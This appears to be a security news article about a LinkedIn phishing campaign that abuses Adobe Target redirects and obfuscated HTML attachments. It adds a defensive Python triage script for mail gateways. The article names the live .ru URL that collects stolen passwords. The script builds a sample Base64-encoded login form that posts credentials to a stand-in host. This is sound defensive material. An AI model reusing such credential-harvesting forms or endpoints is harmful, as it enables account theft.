Fake LinkedIn Emails Abuse Adobe Target to Track Phishing Victims
Cybercriminals are abusing Adobe Target's A/B testing infrastructure in a LinkedIn credential phishing campaign that uses double-extension attachments and obfuscated JavaScript.

Cybercriminals are abusing Adobe Target's A/B testing platform in a LinkedIn phishing campaign that steals credentials and then redirects victims to the legitimate LinkedIn site to avoid suspicion. The attack, detailed by Malwarebytes Labs, uses fake business inquiry emails that appear to come through LinkedIn and include a double-extension attachment named `pdf.html`.
The phishing email masquerades as a business inquiry with a fake signed contract attachment. Red flags include mismatched sender names, email addresses, and signatures, as well as a named company that exists, but not in the US. The attachment uses a double file extension to mislead recipients into thinking it is a PDF when it is actually an HTML file.
The attached HTML file contains heavily obfuscated JavaScript, using URL encoding and Base64 to hide its functionality. When opened, the file presents a simple login form with the target's email address hardcoded, preventing the victim from changing it. This design likely prevents researchers from flooding the receiving channel with fake credentials.
Network analysis reveals that the phishing flow abuses Adobe Target's `omtrdc.net` domain as a redirect and tracking point. The attackers use Adobe Target's infrastructure to track victims who fall for the phishing email, before redirecting them to the legitimate `business.linkedin.com` site to reduce suspicion. The actual credential harvesting is handled by a PHP file hosted on a `.ru` domain.
After deobfuscating the scripts, researchers found that submitted credentials are sent via POST to `http://a1263367.xsph.ru/taam/Ln.php` with the hardcoded email address and the entered password. The PHP file then handles the redirect to LinkedIn, making the victim think they logged in successfully.
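A mail-gateway triage sketch for the attachment traits described above (decoy double extension, URL-encoded and Base64-wrapped markup, a locked email field, a form that posts to an external host). It is an added example, not code from the Malwarebytes analysis; the host `collector.example`, the filename, and the sample form are constructed, and the regexes are heuristics.

```python
import base64, binascii, re
from urllib.parse import quote, unquote

DECOY_EXT = re.compile(r"(^|\.)(pdf|docx?|xlsx?)\.(html?|svg)$", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PASSWORD = re.compile(r"type=[\"']password", re.I)
FORM_POST = re.compile(r"<form[^>]*action=[\"'](https?://[^\"'/]+)", re.I)
FIXED_EMAIL = re.compile(
    r"<input[^>]*value=[\"'][^\"'@\s]+@[^\"']+[\"'][^>]*(?:readonly|disabled)", re.I)

def peel(text, max_depth=4):
    """Return the text plus every layer recovered by URL- and Base64-decoding."""
    layers, queue = [], [(text, 0)]
    while queue:
        cur, depth = queue.pop()
        layers.append(cur)
        if depth >= max_depth:          # bound the work on hostile input
            continue
        if (dec := unquote(cur)) != cur:
            queue.append((dec, depth + 1))
        for run in B64_RUN.findall(cur):
            try:
                out = base64.b64decode(run, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue                # not Base64 text, ignore the run
            queue.append((out, depth + 1))
    return layers

def triage(filename, html):
    """Flag the traits described above; only decoded (hidden) layers count."""
    hidden = "\n".join(peel(html)[1:])  # layer 0 is the attachment as delivered
    return {
        "double_extension": bool(DECOY_EXT.search(filename)),
        "hidden_password_form": bool(PASSWORD.search(hidden)),
        "fixed_email_field": bool(FIXED_EMAIL.search(hidden)),
        "post_hosts": sorted(set(FORM_POST.findall(hidden))),
    }

# Constructed sample: a login form URL-encoded, then Base64-encoded, inside a script.
_form = ('<form method="post" action="https://collector.example/x.php">'
         '<input name="email" value="user@example.com" readonly>'
         '<input type="password" name="pw"></form>')
_blob = base64.b64encode(quote(_form).encode()).decode()
SAMPLE = f'<script>document.write(decodeURIComponent(atob("{_blob}")))</script>'

if __name__ == "__main__":
    print(triage("Signed_Contract.pdf.html", SAMPLE))
```

Hosts returned in `post_hosts` can be compared against an allowlist of expected form targets; a password form that only appears after decoding is the stronger signal of the two.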
This campaign demonstrates a growing trend of attackers abusing legitimate cloud infrastructure for malicious purposes. By leveraging Adobe Target's A/B testing platform, the attackers gain a reliable redirect and tracking mechanism that can evade simple blocklists. The use of a `.ru` domain for credential exfiltration further complicates takedown efforts.
To stay safe, users should avoid unsolicited attachments, check file extensions carefully, enable multi-factor authentication, and use up-to-date anti-malware solutions. Malwarebytes Scam Guard identified the email as a scam, highlighting the importance of using security tools that can detect such threats before they cause harm.